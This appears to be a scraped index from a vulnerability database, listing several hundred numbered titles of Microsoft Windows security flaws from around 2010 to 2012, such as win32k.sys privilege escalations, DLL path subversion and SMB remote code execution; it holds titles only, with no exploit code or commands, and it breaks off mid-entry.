Windows Media Content Handling Arbitrary Code Execution [89315] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [89157] Microsoft Windows IPv6 Router Advertisement (RA) Flooding Weakness [88967] Microsoft Windows SSL/TLS Forced Downgrade MitM Weakness [88966] Microsoft Windows win32k.sys Window Broadcast Message Handling Local Privilege Escalation [88963] Microsoft .NET Framework Windows Forms (WinForms) Component System.Drawing.Imaging.EncoderParameters.ConvertToMemory() Method this.param.Length Parameter Multiple Application Handling Heap Buffer Overflow [88956] Microsoft Windows Printer Spooler Service Print Job Handling Memory Corruption [88836] Microsoft Windows Paint BMP Image Parsing Memory Corruption [88575] Microsoft Windows NT NtAcceptConnectPort Spoofed LPC Port Request Arbitrary Process Hijacking Weakness [88320] Microsoft Windows TrueType Font (TTF) Parsing Unspecified Arbitrary Code Execution [88316] Microsoft Windows OpenType Font (OTF) Parsing Unspecified Arbitrary Code Execution [88313] Microsoft Windows KERNEL32.DLL Filename Parsing Memory Corruption Privilege Escalation [88312] Microsoft Windows DirectPlay Office File Handling Heap Overflow [88051] Microsoft Windows Crafted DHCPv6 Message Remote DoS [87269] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2553) [87268] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2012-2530) [87260] Microsoft Windows Briefcase Handling Underflow (2012-1527) [87259] Microsoft Windows Briefcase Handling Underflow (2012-1528) [86905] Microsoft Windows NTFS ANSI API File Name Truncation Weakness [86903] Microsoft Windows NT CSRSS Malformed Console I/O Local DoS [86866] Microsoft Windows Trusted Publisher Certificate Process Injection UAC Protection Bypass [86865] Microsoft Windows UAC Protection User-assisted Circumvention [86839] Microsoft Windows Media Player AVI File Handling Divide-by-Zero DoS [86768] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Handling Buffer Overflow [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [86060] Microsoft Windows Kerberos Implementation Session Handling Remote DoS [86058] Microsoft Windows Kernel Unspecified Memory Object Handling Local Overflow [85840] Microsoft Windows lpApplicationName Function Path Subversion Local Privilege Escalation [85749] Microsoft Windows win32k.sys TrueType Font File Handling Buffer Overflow [85619] Microsoft Windows Phone 7 X.509 Certificate Subject's Common Name (CN) Field Domain Name Validation Multiple Protocol SSL Server MitM Spoofing Weakness [85444] Microsoft Windows NT MSIEXEC Registry Modification Local Privilege Escalation [85442] Microsoft Windows NT Predictable LPC Message Identifier Weakness [85418] Microsoft Windows Share Service File Handle Request Saturation Remote DoS [85039] Microsoft Windows NT LPC Zone Exhaustion Local DoS [85038] Microsoft Windows Filename Extension Handling Overflow DoS [84604] Microsoft Windows JScript / VBScript Memory Object Size Calculation Website Handling Memory Corruption [84603] Microsoft Windows win32k.sys Use-after-free Local Privilege Escalation [84602] Microsoft Windows Remote Desktop Services Malformed RDP Packet Parsing Remote Code Execution [84601] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Stack Overflow [84600] Microsoft Windows Remote Administration Protocol Malformed RAP Request Parsing Remote Heap Overflow [84599] Microsoft Windows Print Spooler Service Remote Format String [84598] Microsoft Windows netapi32.dll Remote Administration Protocol Malformed RAP Request Parsing Remote DoS [84593] Microsoft Multiple Product Windows Common Controls TabStrip ActiveX (MSCOMCTL.OCX) Document Handling Arbitrary Code Execution [83751] Microsoft Windows Terminal Services LCA Issued Certificates Arbitrary Binary Signing Weakness [83750] Microsoft Windows Gadgets Unspecified Remote Code Execution [83660] Microsoft Windows TLS Protocol HTTPS Session Decryption Information Disclosure [83659] Microsoft Windows win32k.sys Keyboard Layout Handling Local Privilege Escalation [83658] Microsoft Windows win32k.sys Hook Procedure Creation Incorrect Type Handling Local Privilege Escalation [83657] Microsoft Windows ADO Cachesize Data Access Components Memory Object Handling Overflow [83656] Microsoft Windows File / Directory Name Handling Remote Code Execution [83453] Microsoft Windows ProfileList Registry Key Permission Weakness User Profile Subversion [83169] Microsoft Windows NT telnetd Service Port Scan Remote DoS [83126] Microsoft Windows NT Registry Plaintext Service Password Local Disclosure [82928] Microsoft Windows atmfd.dll OpenType Font (OTF) File Handling DoS [82858] Microsoft Windows win32k.sys Thread Creation Attempt Handling Race Condition Local Privilege Escalation [82857] Microsoft Windows TrueType Font Loading Font Resource Reference Counter Handling Local Overflow [82856] Microsoft Windows win32k.sys Clipboard Format Atom Name Handling Local Privilege Escalation [82855] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1865) [82854] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1864) [82851] Microsoft Windows Remote Desktop Protocol (RDP) Memory Object Handling Remote Code Execution [82850] Microsoft Windows User Mode Scheduler Memory Corruption Local Privilege Escalation [82849] Microsoft Windows BIOS Memory Handling ROM Corruption Local Privilege Escalation [82693] Microsoft Windows Terminal Server Licensing Service MD5 Hash Collision Code Signing Spoofing [82605] Microsoft Windows Explorer Crafted Subdirectory Parent Directory Deletion Local DoS [82604] Microsoft Windows Media Player Streamed Broadcast Handling Remote Overflow [82505] Microsoft Windows IE Instances Overflow Group Policy Bypass [82491] Microsoft Windows UTF Character Set File Extension Spoofing Weakness [81736] Microsoft Windows GDI+ EMF File Record Handling Remote Code Execution [81735] Microsoft Windows Partition Manager (partmgr.sys) PnP Configuration Manager Function Call Handling Local Privilege Escalation [81730] Microsoft Windows tcpip.sys Outbound Packet Filtering Windows Firewall Bypass [81729] Microsoft Windows tcpip.sys Double-free IPv6 Address Binding Parsing Local Privilege Escalation [81720] Microsoft Windows t2embed.dll Module TTF File Handling Remote Code Execution [81717] Microsoft Windows win32k.sys Scrollbar Calculation Handling Local Privilege Escalation [81716] Microsoft Windows win32k.sys Keyboard Layout File Handling Local Privilege Escalation [81715] Microsoft Windows win32k.sys Windows and Messages Handling Local Privilege Escalation [81699] Microsoft Windows xxxCreateWindowEx() Function Invalid Memory Access Local DoS [81135] Microsoft Windows Authenticode Signature Verification Functionality Signed Portable Executable File Digest Validation Remote Code Execution [80005] Microsoft Windows DNS Server Domain Resource Record Query Parsing Remote DoS [80004] Microsoft Windows Remote Desktop Protocol Terminal Server RDP Packet Parsing Remote DoS [80003] Microsoft Windows DirectWrite Unicode Character Parsing Remote DoS [80002] Microsoft Windows win32k.sys PostMessage() Function Local Privilege Escalation [80000] Microsoft Windows Remote Desktop Protocol Array Element Loading Handling Double-free Remote Code Execution [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [79269] Microsoft Windows win32k.sys Use-after-free Keyboard Layout Memory Dereference Local Privilege Escalation [79259] Microsoft Windows C Run-Time Library msvcrt.dll Meta File Handling Remote Overflow [79253] Microsoft Windows Ancillary Function Driver (afd.sys) User Mode Input Parsing Local Privilege Escalation [79252] Microsoft Windows Ancillary Function Driver (afd.sys) AfdPoll User Mode Input Parsing Local Privilege Escalation [79117] Microsoft Windows Program Group Path Subversion Arbitrary DLL Injection Code Execution [78759] Microsoft Windows ICMPv6 Echo Request Remote Promiscuous Mode Detection [78212] Microsoft Windows Object Packager Path Subversion packager.exe Loading Remote Code Execution [78211] Microsoft Windows Line21 DirectShow Filter Media File Handling Remote Code Execution [78210] Microsoft Windows Multimedia Library (winmm.dll) MIDI File Handling Remote Code Execution [78209] Microsoft Windows Ntdll.dll Structured Exception Handling Tables Loading SafeSEH Security Bypass [78207] Microsoft Windows Embedded ClickOnce Application Office File Handling Remote Code Execution [78206] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unicode Character Parsing Local Privilege Escalation [78010] Microsoft Windows Phone Text Message Parsing Remote DoS [77908] Microsoft Windows win32k.sys Safari IFRAME Height Attribute Handling Remote Memory Corruption [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [77666] Microsoft Windows Kernel Exception Handler Local Privilege Escalation [77663] Microsoft Windows Object Linking and Embedding (OLE) Object File Handling Remote Code Execution [77662] Microsoft Windows CSRSS Device Event Message Parsing Local Privilege Escalation [77660] Microsoft Windows Media Player / Center DVR-MS File Handling Remote Memory Corruption [77620] Microsoft Windows IE Sandbox Restriction Bypass Local Privilege Escalation [77262] Microsoft Windows win32k.sys Driver Keyboard Layout File Handling Local DoS [77213] Microsoft Windows AppLocker Rule Weakness Local Access Restriction Bypass [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [76901] Microsoft Windows Mail / Windows Meeting Space Path Subversion Arbitrary DLL Injection Code Execution [76900] Microsoft Windows Malformed TrueType Font Parsing DoS [76899] Microsoft Windows TCP/IP Reference Counter Crafted UDP Packet Stream Remote Overflow [76843] Microsoft Windows Win32k TrueType Font Handling Privilege Escalation [76232] Microsoft Windows Ancillary Function Driver afd.sys Local Privilege Escalation [76231] Microsoft Windows Active Accessibility Path Subversion Arbitrary DLL Injection Code Execution [76221] Microsoft Windows win32k.sys Driver Use-after-free Driver Object Handling Arbitrary Code Execution [76220] Microsoft Windows win32k.sys Driver .fon Font File Handling Overflow [76219] Microsoft Windows win32k.sys Driver Type Translation TrueType Font File Handling DoS [76218] Microsoft Windows win32k.sys Driver NULL Dereference Unspecified Arbitrary Code Execution [76205] Microsoft Windows Media Center Path Subversion Arbitrary DLL Injection Code Execution [75473] Microsoft Windows Explorer shmedia.dll AVI File Handling Remote DoS [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75382] Microsoft Windows Shell Extensions Path Subversion Arbitrary DLL Injection Code Execution [75260] Microsoft Windows IPv6 Router Advertisement (RA) MitM Weakness [75199] Intel G41 Driver for Microsoft Windows Unspecified Page Handling DoS [75197] NVIDIA Geforce 310 Driver on Microsoft Windows Unspecified Page Handling DoS [75195] Microsoft Windows GPU Support Functionality Unspecified Page Handling DoS [74483] Microsoft Windows TCP/IP Stack (Tcpip.sys) QoS URL Request Parsing Remote DoS [74482] Microsoft Windows TCP/IP Stack (Tcpip.sys) ICMP Message Parsing Remote DoS [74408] Microsoft Windows Data Access Tracing Component Path Subversion Arbitrary DLL Injection Code Execution [74407] Microsoft Windows Kernel File Metadata Handling Remote DoS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74405] Microsoft Windows Remote Desktop Protocol RDP Packet Parsing Remote DoS [74402] Microsoft Windows Remote Access Service NDISTAPI Driver User Input Validation Weakness Local Privilege Escalation [74401] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Inter-Process Device Event Message Parsing Local Privilege Escalation [74400] Microsoft Windows DNS Service Non-Existent Domain Query Parsing Remote DoS [74399] Microsoft Windows DNS Service NAPTR Query Parsing Overflow [74265] Microsoft Windows CSRSS winsrv.dll SrvGetConsoleTitle() Function Type Casting Weakness Local DoS [73880] ArcSight Connector Appliance Windows Event Log SmartConnector Microsoft OS Version Field XSS [73799] Microsoft Windows Bluetooth Driver Object Handling Remote Code Execution [73796] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC() Function NULL Page Data Write Local Privilege Escalation [73795] Microsoft Windows CSRSS SrvWriteConsoleOutputString() Function Local Overflow [73794] Microsoft Windows CSRSS SrvWriteConsoleOutput() Function Local Overflow [73793] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand() Function Kernel Memory Access Local Privilege Escalation [73792] Microsoft Windows CSRSS AllocConsole() Function Multiple Console Object Orphaning Local Privilege Escalation [73791] Microsoft Windows win32k.sys Driver Function Argument Validation Unspecified Local Information Disclosure [73790] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1888) [73789] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1887) [73788] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1885) [73787] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1881) [73786] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1880) [73785] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1875) [73784] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1884) [73783] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1883) [73782] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1882) [73781] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1879) [73780] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1878) [73779] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1877) [73778] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1876) [73777] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1874) [73654] Microsoft Windows fxsst.dll Path Subversion DLL Injection Code Execution [73602] Microsoft Windows nsiproxy.sys Local DoS [72959] Microsoft Windows Object Linking and Embedding (OLE) Automation Remote Code Execution [72955] Microsoft Windows Ancillary Function Driver Local Privilege Escalation [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72936] Microsoft Windows Server Service Crafted SMB Request Parsing Remote DoS [72935] Microsoft Windows MHTML Mime-Formatted Request Unspecified XSS [72930] Microsoft Windows Hyper-V VMBus vmswitch.sys Crafted Packet Cross-guest Local DoS [72929] Microsoft Windows Distributed File System (DFS) Referral Response Handling Remote DoS [72928] Microsoft Windows Distributed File System (DFS) Response Handling Memory Corruption Remote Code Execution [72919] Microsoft Windows OpenType Font (OTF) Pointer Validation Arbitrary Code Execution [72676] Microsoft Windows Kernel-mode GS Cookie Entropy Weakness [72672] Microsoft Windows AppFix systest.sdb Local DoS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [72234] Microsoft Windows WINS Service Failed Response Data Reuse Memory Corruption Remote Code Execution [71788] Microsoft Windows Messenger ActiveX Unspecified Remote Code Execution [71781] Microsoft Windows SMB Transaction Parsing Unspecified Remote Code Execution [71780] Microsoft Windows DNS Client Service LLMNR Query Processing Remote Code Execution [71779] Microsoft Windows/Office GDI+ (gdiplus.dll) EMF File Processing Overflow [71778] Microsoft Windows Wordpad Word 97 Converter sprmTTextFlow / sprmTSplit PRLs Parsing Memory Corruption [71776] Microsoft Windows OpenType Font (OTF) Driver Font Processing Overflow [71775] Microsoft Windows Fax Cover Page Editor fxscover.exe Text Element Handling Memory Corruption [71774] Microsoft Windows JScript / VBScript Engine Scripting Memory Reallocation Overflow [71773] Microsoft Windows Common Internet File System (CIFS) Malformed Browser Message Handling Overflow [71772] Microsoft Windows SMB Client Response Parsing Unspecified Remote Code Execution [71757] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1242) [71756] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1241) [71755] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1240) [71754] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1239) [71753] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1238) [71752] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1237) [71751] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1236) [71750] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1235) [71749] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1234) [71748] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0675) [71747] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0674) [71746] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0672) [71745] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0671) [71744] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0670) [71743] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0667) [71742] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0666) [71741] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0665) [71740] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0662) [71739] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1233) [71738] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1232) [71737] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1231) [71736] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1230) [71735] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1229) [71734] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1228) [71732] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1227) [71731] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1226) [71730] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1225) [71729] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0677) [71728] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0676) [71727] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0673) [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [71667] Microsoft Windows SetDllDirectory Function Binary Planting Protection Bypass [71016] Microsoft Windows Media Player / Center .dvr-ms File Handling Arbitrary Code Execution [71015] Microsoft Windows DirectShow Path Subversion Arbitrary DLL Injection Code Execution [71014] Microsoft Windows Remote Desktop Client Path Subversion Arbitrary DLL Injection Code Execution [70885] Microsoft Windows LSASS Authentication Request Privilege Escalation [70881] Microsoft Windows SMB Browser Election Request Server Name String Overflow [70835] Microsoft Windows Kerberos Authentication Downgrade Weakness [70834] Microsoft Windows Kerberos Unkeyed Checksum Hashing Mechanism Service Ticket Forgery [70827] Microsoft Windows JScript / VBScript Scripting Engine Memory Corruption Information Disclosure [70826] Microsoft Windows CSRSS Logoff Process Termination Local Information Disclosure [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [70823] Microsoft Windows Kernel Trace Event (WmiTraceMessageVa) Handling Integer Truncation Local Privilege Escalation [70819] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0087) [70818] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0086) [70817] Microsoft Windows Kernel Class Improper Pointer Validation Unspecified Local Privilege Escalation [70816] Microsoft Windows Kernel Window Class Pointer Confusion Unspecified Local Privilege Escalation [70814] Microsoft Windows Kernel Unspecified Memory Corruption Local Privilege Escalation [70693] Microsoft Windows MHTML Protocol Handler MIME Formatted Request XSS [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70390] Microsoft Windows IPv6 Stack Neighbor Discovery Router Advertisement Message Saturation Remote DoS [70263] Microsoft Windows Bitmap Thumbnail shimgvw.dll CreateSizedDIBSECTION() Function biClrUsed Parameter Overflow [70126] Microsoft Windows Fax Cover Page Editor CDrawPoly::Serialize() Function Overflow [70000] Microsoft Windows Remote Access Phonebook (rasphone.exe) Path Subversion Arbitrary EXE Injection Code Execution [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69823] Microsoft Windows Routing and Remote Access NDProxy Unspecified Local Code Execution [69822] Microsoft Windows OpenType Font Driver CMAP Table Parsing Arbitrary Code Execution [69821] Microsoft Windows OpenType Font Driver Pointer Handling Double-free Arbitrary Code Execution [69820] Microsoft Windows OpenType Font Driver Index Array Unspecified Code Execution [69818] Microsoft Windows Hyper-V VMBus Crafted Packet Local DoS [69816] Microsoft Windows BranchCache Path Subversion Arbitrary DLL Injection Code Execution [69802] Microsoft Windows win32k.sys Cursor Linking Unspecified Local Privilege Escalation [69801] Microsoft Windows win32k.sys WriteAV Unspecified Local Privilege Escalation [69800] Microsoft Windows win32k.sys Unspecified Double-free Local Privilege Escalation [69799] Microsoft Windows win32k.sys PFE Pointer Double-free Local Privilege Escalation [69798] Microsoft Windows win32k.sys Unspecified Memory Corruption Local Privilege Escalation [69797] Microsoft Windows win32k.sys Unspecified Local Overflow [69501] Microsoft Windows win32k.sys Driver GreEnableEUDC() Function Local Overflow [69465] Microsoft Windows win32k.sys NtGdiEnableEUDC Local Overflow Privilege Escalation [68946] Microsoft Windows DAO Object Library Path Subversion Arbitrary DLL Injection Code Execution [68933] Microsoft Windows Shell32.dll Environment Variable Expansion SetDllDirectory Function Bypass [68857] Microsoft Windows XP wscript.exe Path Subversion Arbitrary DLL Injection Code Execution [68560] Microsoft Windows SChannel TLSv1 Crafted Client Certificate Request DoS [68559] Microsoft Windows OpenType Font Parsing Unspecified Remote Code Execution [68558] Microsoft Windows OpenType Malformed Font Validation Remote Code Execution [68557] Microsoft Windows Media Player Reload Operation Object Deallocation Memory Corruption [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [68553] Microsoft Windows t2embed.dll Embedded OpenType Font Parsing hdmx Record Parsing Overflow [68552] Microsoft Windows win32k.sys Driver Keyboard Layout Loading Local Privilege Escalation [68551] Microsoft Windows win32k.sys Driver Window Class Data Validation Local Privilege Escalation [68550] Microsoft Windows Media Player Network Sharing Service RTSP Use-after-free Remote Code Execution [68549] Microsoft Windows Common Control Library (comctl32.dll) Third-party SVG Content Handling Overflow [68518] Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation [68517] Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation [67987] Microsoft Windows LSASS Implementation Malformed LDAP Message Handling Remote Overflow [67986] Microsoft Windows Client/Server Runtime Subsystem (CSRSS) Local Privilege Escalation [67985] Microsoft Windows MPEG-4 Codec Content Parsing Overflow [67983] Microsoft Windows WordPad Text Converters Document Parsing Memory Corruption [67784] Microsoft Windows Media Encoder Path Subversion Arbitrary DLL Injection Code Execution [67783] Microsoft Windows SDK for Windows 7 / .NET Framework 4 GraphEdit Path Subversion Arbitrary DLL Injection Code Execution [67722] Microsoft Windows Internet Connection Signup Wizard Path Subversion Arbitrary DLL Injection Code Execution [67600] Microsoft Windows Media Player Path Subversion Arbitrary DLL Injection Code Execution [67599] Microsoft Windows Live Messenger Path Subversion Arbitrary DLL Injection Code Execution [67553] Microsoft Windows Contacts Path Subversion Arbitrary DLL Injection Code Execution [67552] Microsoft Windows Internet Communication Settings Path Subversion Arbitrary DLL Injection Code Execution [67551] Microsoft Windows Indeo Codec (ac25_32.ax) Path Subversion Arbitrary DLL Injection Code Execution [67548] Microsoft Windows Vista BitLocker Drive Encryption Path Subversion Arbitrary DLL Injection Code Execution [67543] Microsoft Windows Movie Maker Path Subversion Arbitrary OCX Injection Code Execution [67535] Microsoft Windows Progman Group Converter Path Subversion Arbitrary DLL Injection Code Execution [67500] Microsoft Windows Live Mail Path Subversion Arbitrary DLL Injection Code Execution [67408] Microsoft Windows Ipv4SetEchoRequestCreate() Interruption DoS [67083] Microsoft Windows TAPI Server (TAPISRV) Service Isolation Bypass Local Privilege Escalation [67005] Microsoft Windows TCP/IP Implementation IppSortDestinationAddresses() Function Local Overflow [67004] Microsoft Windows Malformed IPv6 Extension Header Handling Remote Memory Corruption DoS [66990] Microsoft Windows Kernel Object ACL Validation SeObjectCreateSaclAccessBits() Local DoS [66989] Microsoft Windows Kernel Object Initialization Error Handling Local Privilege Escalation [66988] Microsoft Windows Kernel Thread Creation Handling NtCreateThread() Local Privilege Escalation [66987] Microsoft Windows SChannel Malformed Certificate Request Remote Code Execution [66986] Microsoft Windows Movie Maker Imported Projector File (.MSWMM) String Parsing Overflow [66985] Microsoft Windows MPEG Layer-3 Audio Stream Decoding Overflow [66984] Microsoft Windows iccvid.dll VIDC (Cinepak) Codec Decompression Arbitrary Code Execution [66983] Microsoft Windows win32k.sys Driver xxxCreateWindowsEx hParent Value Handling Local Privilege Escalation [66982] Microsoft Windows win32k.sys Driver User Mode Input Unspecified Local Privilege Escalation [66981] Microsoft Windows win32k.sys Driver User Mode Copy Memory Allocation Local Privilege Escalation [66979] Microsoft Windows win32k.sys Driver GreStretchBltInternal() Handling Local DoS [66978] Microsoft Windows Tracing Feature for Services Registry String Handling Memory Corruption Local Privilege Escalation [66977] Microsoft Windows Tracing Feature for Services Registry Key ACL Local Privilege Escalation [66976] Microsoft Windows SMB Server Compounded Request Handling Stack Exhaustion Remote DoS [66975] Microsoft Windows SMB Server Crafted Packet Handling Unspecified Remote DoS [66974] Microsoft Windows SMB Server SMB_COM_TRANSACTION2 Request Handling Remote Code Execution [66934] Microsoft Windows win32k.sys CreateDIBPalette() Function Local Overflow [66387] Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution [66003] Microsoft Windows win32k.sys NtUserCheckAccessForIntegrityLevel Use-After-Free Local Privilege Escalation [66001] Microsoft Windows mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Local Pointer Disclosure [65529] Microsoft Windows Help and Support Center sysinfo/sysinfomain.htm svr Parameter XSS [65264] Microsoft Windows hcp:// Protocol Handler MPC::HexToNum() Function String Miscalculation Arbitrary Command Execution [65225] Microsoft Windows Kernel-Mode Driver Window Creation Local Privilege Escalation [65224] Microsoft Windows Kernel-Mode Driver Win32k.sys GetDCEx() Function Device Contexts (DC) Handling Local Privilege Escalation [65223] Microsoft Windows Kernel-Mode Driver TrueType Font Parsing Local Privilege Escalation [65222] Microsoft Windows MJPEG Media Decompression Unspecified Remote Code Execution [65221] Microsoft Windows Media Decompression Unspecified Remote Code Execution [65219] Microsoft Windows / Office COM Object Instantiation Validation Remote Code Execution [65217] Microsoft Windows OpenType Compact Font Format (CFF) Driver Privilege Escalation [64928] Microsoft Windows SMB Client Transaction Response Handling Memory Corruption (2010-0476) [64927] Microsoft Windows SMB Client Transaction SMB_COM_TRANSACTION2 Response Handling Memory Corruption [64926] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0477) [64925] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0269) [64731] Microsoft Windows Canonical Display Driver (cdd.dll) Unspecified Memory Corruption [64530] Microsoft Outlook Express / Windows Mail STAT Response Overflow [64391] Microsoft Windows Group Policy Management Editor Account Password Removal Weakness [64341] Microsoft Windows Unspecified SMB Negotiation Remote DoS [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64058] Microsoft Windows win32k.sys SfnINSTRING() Local DoS [64057] Microsoft Windows win32k.sys Driver SfnLOGONNOTIFY() Function Local Privilege Escalation [63765] Microsoft Windows Media Player ActiveX fourCC Compression Code Codec Retrieval Arbitrary Code Execution [63749] Microsoft Windows MPEG Layer-3 Audio Decoder AVI File Handling Overflow [63747] Microsoft Windows ISATAP Component IPv6 Tunneled Packet IP Address Spoofing Weakness [63746] Microsoft Windows Authenticode Signature Verification Cabview Manipulation Privilege Escalation [63745] Microsoft Windows Authenticode WinVerifyTrust Signature Manipulation Validation Bypass [63739] Microsoft Windows SMTP / Exchange Server Malformed Command Sequence Remote Information Disclosure [63738] Microsoft Windows SMTP / Exchange Server DNS Mail Exchanger (MX) Resource Record Handling Remote DoS [63736] Microsoft Windows Kernel Symbolic Link Value Processing Unspecified Local DoS [63735] Microsoft Windows Kernel Exception Handling Unspecified Local DoS [63733] Microsoft Windows Kernel Registry Link Symbolic Link Extraction Local Privilege Escalation [63732] Microsoft Windows Kernel Malformed Image Handling Local DoS [63731] Microsoft Windows Kernel Registry Hive Symbolic Link Creation Local Privilege Escalation [63730] Microsoft Windows Kernel Registry Key Validation Unspecified Local DoS [63729] Microsoft Windows Kernel Virtual Path Parsing Local DoS [63728] Microsoft Windows Unspecified Kernel System Call Registry Handling Local DoS [63726] Microsoft Windows Media Unicast Service Transport Packet Handling Remote Overflow [63468] Microsoft Windows ANI Parser BITMAPINFO Header Crafted biClrUsed Value DoS [63231] Microsoft Windows Media Player Crafted AVI File Colorspace Conversion Memory Corruption [62855] Microsoft Windows HTML Help Control ActiveX chm File Handling Arbitrary Code Execution [62811] Microsoft Windows Movie Maker / Producer IsValidWMToolsStream() Function Project File (.MSWMM) Handling Overflow [62756] Microsoft Windows VBScript MsgBox() Function helpfile Argument Arbitrary Command Execution [62660] Microsoft Windows Unspecified API Argument Validation Local DoS [62652] Microsoft Windows Media Player Crafted MPG File Handling Overflow DoS [62637] Microsoft Windows Malformed TCP SYN Packet Remote DoS (Blat) [62632] Microsoft Windows VBScript MsgBox() Function HLP File Arbitrary Command Execution [62259] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [62258] Microsoft Windows Kerberos Ticket-Granting-Ticket Renewal Request NULL Dereference Remote DoS [62257] Microsoft Windows DirectShow AVI File Decompression Overflow [62256] Microsoft Windows SMB Server Crafted Network Message Remote Code Execution [62255] Microsoft Windows SMB Server Crafted Packet Handling Remote DoS [62254] Microsoft Windows SMB Server Crafted Packet Handling NULL Dereference Remote DoS [62253] Microsoft Windows SMB Server NTLM Authentication Nonce Entropy Weakness [62252] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Session Termination Weakness Local Privilege Escalation [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [62250] Microsoft Windows TCP/IP Stack ICMPv6 Router Advertisement Packet 